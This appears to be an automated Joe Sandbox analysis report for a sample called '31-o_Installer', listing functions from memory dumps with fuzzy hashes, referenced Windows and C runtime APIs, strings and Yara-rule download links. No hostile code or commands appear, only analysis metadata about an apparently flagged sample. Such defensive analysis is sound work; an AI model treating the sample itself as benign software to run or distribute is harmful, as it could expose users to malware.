Opcode Fuzzy Hash: 21018234ac6c65dce347e9eb3c09d9e563dc327998c84d170fb29f747537f1fa
Instruction Fuzzy Hash: 30C18173D2A5F3898B36892D04A823FEE616E81B9431FC391DCD83F589C2376D2995D0

Function 0027007E Relevance: .3, Instructions: 326COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction ID: 6b6bd321e97e105657d1f98193899bde3051c75489003917bfbc4a410294917a
Opcode Fuzzy Hash: 21b74c51e355f1ada917146b454bba93dbff062365e48e41ecc74cc68dac6f4d
Instruction Fuzzy Hash: DFB19233D2A5F3868B35892D049823FEE626E81B8431BC3D1DCD83F589C6376D2995D0

Function 053307A0 Relevance: .3, Instructions: 260COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d852ec7ca4fde7e7a391660c85568e4df8c39d23f7a913afd13cebeca19eacd
Instruction ID: 3bfc0796aad08dd7b83f867319e80faec97e53415cbbc71e5031055602512d62
Opcode Fuzzy Hash: 1d852ec7ca4fde7e7a391660c85568e4df8c39d23f7a913afd13cebeca19eacd
Instruction Fuzzy Hash: 0E819134F052198BDB1DEFB5945967FBBB7BFC8B90B04886DD446E7284CE3498018B91

Function 05334B20 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4548564340.0000000005330000.00000040.00000800.00020000.00000000.sdmp, Offset: 05330000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5330000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6db7703d7db76b29c5aae2e9059684d0eb870cd9f5fb8e1393b962108f36c909
Instruction ID: 6953333dbfb3b66ac9ca6cb97f44447c5b524b316a8be95e87a3cc81520342cf
Opcode Fuzzy Hash: 6db7703d7db76b29c5aae2e9059684d0eb870cd9f5fb8e1393b962108f36c909
Instruction Fuzzy Hash: 63915B70E003499FDF10CFA9C99A7ADBBF2BF88314F148129E415A72A4EB749845CF91

Function 02E71628 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4546753874.0000000002E60000.00000040.00001000.00020000.00000000.sdmp, Offset: 02E60000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e60000_31-o_Installer.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction ID: c6f7cd3ac6d1c4042dc55b11199854032cdcf33777ef53288f2b2425b83851a2
Opcode Fuzzy Hash: 54093e43b9854a2d540d9dde3269946287902615532eb97d05431949d4969fe2
Instruction Fuzzy Hash: 70F06D32250205AFCF158F88CC41EAA77E9EF08264B088069FD09DB221E331FD209B80

Function 00261671 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction ID: b7981b2b79c9869a23804c67e8d6833124cc0914444bbad9644d1b21342d72dc
Opcode Fuzzy Hash: e9b762c1d9091a2c99a71b58989111832db4a596a20ce5d8aa31cc9ae1b6fce7
Instruction Fuzzy Hash: 71C012B1C04318AB8F04EFED544109DBBF8AA04200B40C5AA9405B2242D27052104644

Function 002698E5 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 109libraryloadermemoryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,?,00265A5E), ref: 002698ED
__mtterm.LIBCMT ref: 002698F9

Part of subcall function 00269632: DecodePointer.KERNEL32(00000002,00269A5B,?,00265A5E), ref: 00269643
Part of subcall function 00269632: TlsFree.KERNEL32(00000002,00269A5B,?,00265A5E), ref: 0026965D
Part of subcall function 00269632: DeleteCriticalSection.KERNEL32(00000000,00000000,77375810,?,00269A5B,?,00265A5E), ref: 0026B6A4
Part of subcall function 00269632: _free.LIBCMT ref: 0026B6A7
Part of subcall function 00269632: DeleteCriticalSection.KERNEL32(00000002,77375810,?,00269A5B,?,00265A5E), ref: 0026B6CE

GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 0026990F
GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 0026991C
GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00269929
GetProcAddress.KERNEL32(00000000,FlsFree), ref: 00269936
TlsAlloc.KERNEL32(?,00265A5E), ref: 00269986
TlsSetValue.KERNEL32(00000000,?,00265A5E), ref: 002699A1
__init_pointers.LIBCMT ref: 002699AB
EncodePointer.KERNEL32(?,00265A5E), ref: 002699BC
EncodePointer.KERNEL32(?,00265A5E), ref: 002699C9
EncodePointer.KERNEL32(?,00265A5E), ref: 002699D6
EncodePointer.KERNEL32(?,00265A5E), ref: 002699E3
DecodePointer.KERNEL32(002697B6,?,00265A5E), ref: 00269A04
__calloc_crt.LIBCMT ref: 00269A19
DecodePointer.KERNEL32(00000000,?,00265A5E), ref: 00269A33
GetCurrentThreadId.KERNEL32 ref: 00269A45

Strings

FlsGetValue, xrefs: 00269911
KERNEL32.DLL, xrefs: 002698E8
FlsSetValue, xrefs: 0026991E
FlsFree, xrefs: 0026992B
FlsAlloc, xrefs: 00269909

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Pointer$AddressEncodeProc$Decode$CriticalDeleteSection$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__mtterm_free
String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
API String ID: 3698121176-3819984048
Opcode ID: b4df4ab2a0de6958bc08a55cc21936d1a53e86fe833360a45f1043661b74349e
Instruction ID: 7d3fe0dfc8e50d592f3271d5a49a1fc2d8f1526753ead27f898633f8888918c6
Opcode Fuzzy Hash: b4df4ab2a0de6958bc08a55cc21936d1a53e86fe833360a45f1043661b74349e
Instruction Fuzzy Hash: 4231A4759233119EE7619F75BD4E61D3BE8EB81B60B10051BE418D22B1DBB098D5CF40

Function 0026235F Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00262364
std::_Lockit::_Lockit.LIBCPMT ref: 00262373
int.LIBCPMT ref: 0026238A

Part of subcall function 00261035: std::_Lockit::_Lockit.LIBCPMT ref: 00261046

std::bad_exception::bad_exception.LIBCMT ref: 002623C1
__CxxThrowException@8.LIBCMT ref: 002623CF
std::locale::facet::_Incref.LIBCPMT ref: 002623DF
std::locale::facet::_Facet_Register.LIBCPMT ref: 002623E5

Strings

bad cast, xrefs: 002623B9

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 878426289-3145022300
Opcode ID: b0d0529235a25301eba8a9bed101988e347c04cd71db947ccf58f8043c7206c1
Instruction ID: 3b55559de926d67287b1bcb0b79c9b2bd5253754bbe0adee2f4f75a9aceaea2a
Opcode Fuzzy Hash: b0d0529235a25301eba8a9bed101988e347c04cd71db947ccf58f8043c7206c1
Instruction Fuzzy Hash: DA11A03692061597CF05FB60DC42AAEB335AF81720F240159F411672D1DF749AF88B90

Function 00261E2E Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00261E33
std::_Lockit::_Lockit.LIBCPMT ref: 00261E42
int.LIBCPMT ref: 00261E59

Part of subcall function 00261035: std::_Lockit::_Lockit.LIBCPMT ref: 00261046

std::bad_exception::bad_exception.LIBCMT ref: 00261E90
__CxxThrowException@8.LIBCMT ref: 00261E9E
std::locale::facet::_Incref.LIBCPMT ref: 00261EAE
std::locale::facet::_Facet_Register.LIBCPMT ref: 00261EB4

Strings

bad cast, xrefs: 00261E88

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: LockitLockit::_std::_std::locale::facet::_$Exception@8Facet_H_prologIncrefRegisterThrowstd::bad_exception::bad_exception
String ID: bad cast
API String ID: 878426289-3145022300
Opcode ID: be279956c5939c0520dcfc65789946670b40524159d4976e71c231824ddf9d7f
Instruction ID: b98167be6c8e2a073deee81bb01d5d71b947045e5fc546344830333a34cfc096
Opcode Fuzzy Hash: be279956c5939c0520dcfc65789946670b40524159d4976e71c231824ddf9d7f
Instruction Fuzzy Hash: 7811E536921115ABCF05FB60DD42AAEB375AF91721F280159F811672D1DF30EAB4CF90

Function 00267413 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 49COMMON

Download Yara Rule

APIs

__getptd_noexit.LIBCMT ref: 0026741A

Part of subcall function 00269723: GetLastError.KERNEL32(?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269727
Part of subcall function 00269723: ___set_flsgetvalue.LIBCMT ref: 00269735
Part of subcall function 00269723: __calloc_crt.LIBCMT ref: 00269749
Part of subcall function 00269723: DecodePointer.KERNEL32(00000000,?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269763
Part of subcall function 00269723: GetCurrentThreadId.KERNEL32 ref: 00269779
Part of subcall function 00269723: SetLastError.KERNEL32(00000000,?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269791

__calloc_crt.LIBCMT ref: 0026743C
__get_sys_err_msg.LIBCMT ref: 0026745A
_strcpy_s.LIBCMT ref: 00267462
__invoke_watson.LIBCMT ref: 00267477

Strings

Visual C++ CRT: Not enough memory to complete call to strerror., xrefs: 00267427, 0026744A

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: ErrorLast__calloc_crt$CurrentDecodePointerThread___set_flsgetvalue__get_sys_err_msg__getptd_noexit__invoke_watson_strcpy_s
String ID: Visual C++ CRT: Not enough memory to complete call to strerror.
API String ID: 3117964792-798102604
Opcode ID: 3a8dbc98b16cea2ecd2520fa6bbb9756d9053dbece81c19f27155875d3ce9ba9
Instruction ID: b7e1997c9af375e30a41b6391bef6497d288f1511adcc45842264e40e01a2f1a
Opcode Fuzzy Hash: 3a8dbc98b16cea2ecd2520fa6bbb9756d9053dbece81c19f27155875d3ce9ba9
Instruction Fuzzy Hash: 80F02B7253C21027A7203D297CC996B76BCDB41B5CF144479F64997602ED719CF04695

Function 00261A81 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00261A86
std::_Lockit::_Lockit.LIBCPMT ref: 00261A98
std::exception::exception.LIBCMT ref: 00261ACF

Part of subcall function 00263C86: std::exception::_Copy_str.LIBCMT ref: 00263CA1

__CxxThrowException@8.LIBCMT ref: 00261AE4

Part of subcall function 0026450C: RaiseException.KERNEL32(?,?,002613AC,?,?,?,?,?,002613AC,?,0027CCE8,00000000), ref: 0026454E

std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00261AED

Strings

bad locale name, xrefs: 00261AC8

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: std::_$Copy_strExceptionException@8H_prologLocinfo::_Locinfo_ctorLockitLockit::_RaiseThrowstd::exception::_std::exception::exception
String ID: bad locale name
API String ID: 446407826-1405518554
Opcode ID: ae4d28cb46da46f5f95ccda3bebacd53e9c10cb44eba64886f032f051ce05c4f
Instruction ID: c61889757b37d537d81c08a5426283e5905b352ca48d7e9b874d6495a8553497
Opcode Fuzzy Hash: ae4d28cb46da46f5f95ccda3bebacd53e9c10cb44eba64886f032f051ce05c4f
Instruction Fuzzy Hash: 71016DB2815744AECB21EFA9C4805CEFFB4BB19300B90C56FE59993601C7709768CFA5

Function 0026966F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,0027D638,00000008,00269777,00000000,00000000,?,?,0026A964,00264478,?,?,00263C7B,?,?,0026101C), ref: 00269680
__lock.LIBCMT ref: 002696B4

Part of subcall function 0026B7B7: __mtinitlocknum.LIBCMT ref: 0026B7CD
Part of subcall function 0026B7B7: __amsg_exit.LIBCMT ref: 0026B7D9
Part of subcall function 0026B7B7: EnterCriticalSection.KERNEL32(00000000,00000000,?,002696B9,0000000D), ref: 0026B7E1

InterlockedIncrement.KERNEL32(?), ref: 002696C1
__lock.LIBCMT ref: 002696D5
___addlocaleref.LIBCMT ref: 002696F3

Strings

KERNEL32.DLL, xrefs: 0026967B

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
String ID: KERNEL32.DLL
API String ID: 637971194-2576044830
Opcode ID: b2e92e631d6904f97edaf7f128e37eae6e2b3bb4f41b8fffd5f4d705bf5f853c
Instruction ID: f043bfc2984cd8b78f585b6abccd1807113aa09ba0b644671c7a12e50e39805b
Opcode Fuzzy Hash: b2e92e631d6904f97edaf7f128e37eae6e2b3bb4f41b8fffd5f4d705bf5f853c
Instruction Fuzzy Hash: 58016D71825B009FD7219F75D84A74AFBF4AF50324F20890DE89A962A1CBB4A5D4CF15

Function 002676D0 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 23COMMON

Download Yara Rule

APIs

__getptd.LIBCMT ref: 002676F1

Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC

__getptd.LIBCMT ref: 00267702
__getptd.LIBCMT ref: 00267710

Strings

MOC, xrefs: 002676E3
RCC, xrefs: 002676DC
csm, xrefs: 002676EA

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __getptd$__amsg_exit__getptd_noexit
String ID: MOC$RCC$csm
API String ID: 803148776-2671469338
Opcode ID: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction ID: 363004e4b9605cf11c5dc1e9bd8c13fff0f4d9e188a305b4cabffbb6df36fc51
Opcode Fuzzy Hash: 1fefd8f84a83a40e8ccdaf602bb71a21e828e3d03397e904957b1e236622b6d8
Instruction Fuzzy Hash: 7AE092751341058FDF229F68D04AB69B794FB48319F5E54A1E40DCB222CB74E9F09A92

Function 00267993 Relevance: 9.0, APIs: 6, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

__CreateFrameInfo.LIBCMT ref: 002679BB

Part of subcall function 00264842: __getptd.LIBCMT ref: 00264850
Part of subcall function 00264842: __getptd.LIBCMT ref: 0026485E

__getptd.LIBCMT ref: 002679C5

Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC

__getptd.LIBCMT ref: 002679D3
__getptd.LIBCMT ref: 002679E1
__getptd.LIBCMT ref: 002679EC
_CallCatchBlock2.LIBCMT ref: 00267A12

Part of subcall function 002648E7: __CallSettingFrame@12.LIBCMT ref: 00264933

Part of subcall function 00267AB9: __getptd.LIBCMT ref: 00267AC8
Part of subcall function 00267AB9: __getptd.LIBCMT ref: 00267AD6

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
String ID:
API String ID: 1602911419-0
Opcode ID: eeab85b677f4f54c23aa05237dcc4011d470620a882085f63ed2e8d5c1f2aee8
Instruction ID: f5e2bcccdfd96dc6357314a7da2a8af046eeeba08e1d6f64ec1c9293a4723f40
Opcode Fuzzy Hash: eeab85b677f4f54c23aa05237dcc4011d470620a882085f63ed2e8d5c1f2aee8
Instruction Fuzzy Hash: EE112BB5C20209DFDF00EFA4D845AEDBBB0FF08315F148469F854A7252DB389AA19F54

Function 0026D224 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0026D230

Part of subcall function 0026979C: __getptd_noexit.LIBCMT ref: 0026979F
Part of subcall function 0026979C: __amsg_exit.LIBCMT ref: 002697AC

__amsg_exit.LIBCMT ref: 0026D250
__lock.LIBCMT ref: 0026D260
InterlockedDecrement.KERNEL32(?), ref: 0026D27D
_free.LIBCMT ref: 0026D290
InterlockedIncrement.KERNEL32(00B31688), ref: 0026D2A8

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
String ID:
API String ID: 3470314060-0
Opcode ID: 06e1c9fcdd4201148d97f51f9e0f02b99f988fa2c7cd05f52819f99b201ed59b
Instruction ID: a4d333c6183073993b7b89cc2cecbb20c6f4149bcf31b267ec3ca501c4014681
Opcode Fuzzy Hash: 06e1c9fcdd4201148d97f51f9e0f02b99f988fa2c7cd05f52819f99b201ed59b
Instruction Fuzzy Hash: E101F933E217169BCB61AF259859B4DB3A0BF00721F044019EC08A7292CB70DDE1CFD1

Function 00261B06 Relevance: 9.0, APIs: 6, Instructions: 46COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00261B0B
std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 00261B1F

Part of subcall function 002632F5: _setlocale.LIBCMT ref: 00263307

_free.LIBCMT ref: 00261B2D

Part of subcall function 00264452: HeapFree.KERNEL32(00000000,00000000,?,00263C7B,?,?,0026101C), ref: 00264468
Part of subcall function 00264452: GetLastError.KERNEL32(?,?,00263C7B,?,?,0026101C), ref: 0026447A

_free.LIBCMT ref: 00261B3F
_free.LIBCMT ref: 00261B51
_free.LIBCMT ref: 00261B63

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: _free$ErrorFreeH_prologHeapLastLocinfo::_Locinfo_dtor_setlocalestd::_
String ID:
API String ID: 770894815-0
Opcode ID: bf61b38823c23622de6db5f19a5022e0785a9c7ff495307da554c38b7b7a07c9
Instruction ID: e3669833a52b6d17e55f2863511a86795842e18fa6320db1b107fcb7b215d293
Opcode Fuzzy Hash: bf61b38823c23622de6db5f19a5022e0785a9c7ff495307da554c38b7b7a07c9
Instruction Fuzzy Hash: FC015E316207019BDB28EF68D406B9BB3E8BF01725F14C51EE055D7581DF78E9648E60

Function 0026153B Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBCMT ref: 0026155A
std::exception::exception.LIBCMT ref: 0026157C

Strings

ios_base::failbit set, xrefs: 002615A4
ios_base::badbit set, xrefs: 0026156E
ios_base::eofbit set, xrefs: 00261578, 002615B4

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: Exception@8Throwstd::exception::exception
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 3728558374-1866435925
Opcode ID: 5fad501d381663661ec5a3d9eb7020eead4e1063b3a26191efab151086124973
Instruction ID: ec469edb0af9dadcb2cfd6568f57d5e5c5c7d987aeb876f9269ec7182acf41df
Opcode Fuzzy Hash: 5fad501d381663661ec5a3d9eb7020eead4e1063b3a26191efab151086124973
Instruction Fuzzy Hash: 5A0175F1830349AFCB10EF68C4066ADB7E45F84714FA8C119A9179B142DA74EBB5CF51

Function 00267D40 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBCMT ref: 00267D53

Part of subcall function 00267CAE: ___BuildCatchObjectHelper.LIBCMT ref: 00267CE4

_UnwindNestedFrames.LIBCMT ref: 00267D6A
___FrameUnwindToState.LIBCMT ref: 00267D78

Strings

csm, xrefs: 00267D42
csm, xrefs: 00267D4F, 00267D64, 00267D77, 00267D95, 00267DA5

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545345196.0000000000279000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545382115.000000000027F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4545419954.0000000000283000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_260000_31-o_Installer.jbxd

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction ID: 234969a8c3e70d9b5859dae037ccea8d2d35284a73e361ef2228526c2fd4d2cb
Opcode Fuzzy Hash: 6c894a3f2729321d8e37f772740de334ea6d335cc87a979b471e5224e4f7bb87
Instruction Fuzzy Hash: 5A01423101510ABBDF22AF50EC42EAA7F6AFF08358F244410FD5915121D7329AB1EFA0

Function 0026DE68 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0026DE76

Part of subcall function 0026729E: __FF_MSGBANNER.LIBCMT ref: 002672B7
Part of subcall function 0026729E: __NMSG_WRITE.LIBCMT ref: 002672BE
Part of subcall function 0026729E: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,002663C9,00000000,00000001,00000000,?,0026B742,00000018,0027D728,0000000C,0026B7D2), ref: 002672E3

_free.LIBCMT ref: 0026DE89

Memory Dump Source

Source File: 00000000.00000002.4545209506.0000000000261000.00000020.00000001.01000000.00000003.sdmp, Offset: 00260000, based on PE: true

Associated: 00000000.00000002.4545175201.0000000000260000.00000002.00000001.01000000.00000003.sdmpDownload File
